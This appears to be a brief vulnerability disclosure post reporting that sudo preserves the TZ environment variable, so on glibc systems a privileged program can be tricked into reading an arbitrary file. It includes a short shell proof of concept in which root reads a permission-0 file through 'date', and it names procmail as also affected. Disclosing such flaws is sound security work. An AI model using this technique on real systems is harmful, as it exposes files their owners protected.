By default, sudo preserves the TZ variable[1] from user's environment. This is a bad idea on glibc systems, where TZ can be abused to trick the program to read an arbitrary file. PoC:
$ echo moo > tz
$ chmod 0 tz
$ cat tz
cat: tz: Permission denied
$ TZ=$PWD/tz sudo -u root strace -e read date
read(3, "\177ELF\1\1\1\3\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\300\233\1\0004\0\0\0"..., 512) = 512
read(3, "moo\n", 4096) = 4
read(3, "", 4096) = 0
Wed Oct 15 20:42:42 2014
+++ exited with 0 +++
Procmail is another program that recklessly whitelists TZ[2].
[1] https://sources.debian.net/src/sudo/1.8.5p2-1%2Bnmu1/plugins/sudoers/env.c/?hl=198#L189
[2] https://sources.debian.net/src/procmail/3.22-20%2Bdeb7u1/config.h/?hl=22#L13
--
Jakub Wilk